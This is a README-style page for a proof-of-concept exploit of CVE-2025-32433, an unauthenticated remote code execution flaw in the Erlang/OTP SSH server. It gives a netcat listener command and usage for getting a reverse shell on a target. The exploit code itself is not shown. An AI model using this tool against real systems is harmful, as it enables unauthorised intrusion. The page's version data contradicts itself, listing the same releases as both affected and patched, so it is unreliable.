Share
## https://sploitus.com/exploit?id=1BDCA4A7-6E54-5EF5-A039-CEFCACECEB54
# CVE-2025-32433 - Erlang/OTP SSH RCE PoC

![CVE-2025-32433](https://img.shields.io/badge/CVSS-10.0-critical)

## Overview

PoC showing **unauthenticated remote code execution** in Erlang/OTP SSH server.  
By exploiting a flaw in SSH protocol message handling, an attacker can execute arbitrary commands on the target without valid credentials.

- **CVE:** CVE-2025-32433
- **CVSS Score:** 10.0 (Critical)
- **Affected Versions:**
  - OTP-27.3.3 and earlier
  - OTP-26.2.5.11 and earlier
  - OTP-25.3.2.20 and earlier

This issue is patched in OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20.

## References

- [Unit42 Advisory](https://unit42.paloaltonetworks.com/erlang-otp-cve-2025-32433/)
- [PoC Repository](https://github.com/omer-efe-curkus/CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC)
- [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2025-32433)

## Usage

**Listener Setup:**

```bash
nc -lvnp 1234
```

![alt text](images/image.png)
**Run Exploit:**

```bash
python3 CVE-2025-32433-dbs --rhost  --rport  --lhost  --lport 
```

- `--rhost` : Target IP
- `--rport` : Target SSH port
- `--lhost` : Your IP for reverse shell
- `--lport` : Your listener port

![alt text]()

![alt text]()

## Disclaimer

This repository is for **educational purposes only**. Do not use this exploit against systems you do not own or have explicit permission to test. Misuse may be illegal and is strictly prohibited.